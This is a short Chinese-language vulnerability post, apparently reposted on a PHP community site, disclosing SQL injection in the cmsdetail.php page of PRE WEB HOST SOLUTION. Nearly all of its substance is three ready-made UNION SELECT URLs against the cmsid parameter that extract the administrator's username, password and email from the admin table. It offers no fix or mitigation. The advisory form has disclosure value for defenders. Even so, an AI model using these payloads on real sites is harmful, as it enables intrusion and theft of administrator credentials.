文章详情

Php文档 Php问答 行业资讯 Php论坛 Php手册 Php博客
  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
关闭搜索
php爱好者> php文档>PRE WEB HOST SOLUTION SQL Injection

PRE WEB HOST SOLUTION SQL Injection

时间:2010-11-14  来源:Cru3l.b0y

发布日期:2010-11.14
发布作者:Cru3l.b0y

影响版本:未知
官方地址:http://www.preproject.com

漏洞类型:SQL注入
漏洞描述:cmsdetail.php页面未对参数进行过滤直接带入SQL查询,导致注入攻击。

 

 测试方法:

[+] Exploit :

 

暴用户名:Username : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,username+from+admin

暴用户密码:Password : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,pass+from+admin

暴管理邮箱:Email : http://target/path/cmsdetail.php?cmsid=1+union+select+1,2,3,Email+from+admin
 

 

标签分类: SQL注入

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载

Copyright 2006-2020 (phpxiu.com) All Rights Reserved.

本站为非盈利性网站,不接受任何广告。php爱好者